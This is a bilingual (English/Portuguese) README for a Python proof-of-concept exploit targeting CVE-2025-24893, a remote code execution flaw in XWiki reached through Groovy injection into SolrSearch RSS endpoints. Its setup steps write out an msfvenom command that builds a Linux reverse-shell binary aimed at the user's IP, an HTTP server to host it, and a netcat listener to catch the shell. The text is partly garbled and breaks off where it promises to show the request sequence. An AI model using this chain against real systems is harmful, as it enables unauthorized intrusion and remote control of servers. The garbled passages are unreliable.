
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
Este script em Python explora a CVE-2025-24893, uma vulnerabilidade de execução remota de código (RCE) no XWiki causada por sandboxing inadequado em macros Groovy renderizadas de forma assíncrona. Permite execução arbitrária de comandos através de injeção em endpoints SolrSearch baseados em RSS.
msfvenom)Clone ou baixe o script.
Certifique-se de ter os seguintes itens instalados:
msfvenom do Metasploitjq (usado nos payloads bash)Execute o script:
python3 CVE-2025-24893-PoC.py
Selecione no menu:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<seu_ip> LPORT=<porta_beacon> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
O script envia a seguinte sequência para o alvo:
Esta ferramenta é apenas para fins educacionais e de teste autorizado. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.